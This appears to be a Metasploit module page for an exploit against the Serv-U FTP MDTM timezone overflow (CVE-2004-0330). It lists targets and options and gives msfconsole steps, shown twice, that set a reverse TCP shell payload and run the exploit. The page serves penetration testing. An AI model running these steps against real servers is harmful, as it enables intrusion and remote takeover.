Serv-U FTPD MDTM Overflow
This is an exploit for the Serv-U\'s MDTM command timezone overflow. It has been heavily tested against versions 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against nt4/2k/xp/2k3. I have also had success against version 3, but only tested 1 version/os. The bug is in all versions prior to 5.0.0.4, but this exploit will not work against versions not listed above. You only get one shot, but it should be OS/SP independent. This exploit is a single hit, the service dies after the shellcode finishes execution.
Exploit Rank
- Good
Exploit Authors
- spoonm < spoonm [at] no$email.com >
Vulnerability References
- CVE-2004-0330
- OSVDB-4073
- http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html
- http://www.cnhonker.com/advisory/serv-u.mdtm.txt
- http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54
- BID-9751
Exploit Targets
- 0 - Serv-U Uber-Leet Universal ServUDaemon.exe (default)
- 1 - Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe
- 2 - Serv-U 5.0.0.0 ServUDaemon.exe
Exploit Development
Similar Exploit Modules
- exploit/windows/ftp/32bitftp_list_reply
- exploit/windows/ftp/3cdaemon_ftp_user
- exploit/windows/ftp/aasync_list_reply
- exploit/windows/ftp/ability_server_stor
- exploit/windows/ftp/absolute_ftp_list_bof
- exploit/windows/ftp/cesarftp_mkd
- exploit/windows/ftp/dreamftp_format
- exploit/windows/ftp/easyfilesharing_pass
- exploit/windows/ftp/easyftp_cwd_fixret
- exploit/windows/ftp/easyftp_list_fixret
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/ftp/servu_mdtm
msf exploit(servu_mdtm) > show payloads
msf exploit(servu_mdtm) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(servu_mdtm) > set LHOST [MY IP ADDRESS]
msf exploit(servu_mdtm) > set RHOST [TARGET IP]
msf exploit(servu_mdtm) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/ftp/servu_mdtm
msf exploit(servu_mdtm) > show payloads
msf exploit(servu_mdtm) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(servu_mdtm) > set LHOST [MY IP ADDRESS]
msf exploit(servu_mdtm) > set RHOST [TARGET IP]
msf exploit(servu_mdtm) > exploit
Exploit Module Options
| FTPPASS | The password for the specified username (default: mozilla@example.com) |
| FTPUSER | The username to authenticate as (default: anonymous) |
| RHOST | The target address |
| RPORT | The target port (default: 21) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| FTPDEBUG | Whether or not to print verbose debug statements |
| FTPTimeout | The number of seconds to wait for a reply from an FTP command |
| ForceDoubling | 1 to force \xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect |
| Proxies | Use a proxy chain |
| SEHOffset | Offset from beginning of timezone to SEH |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |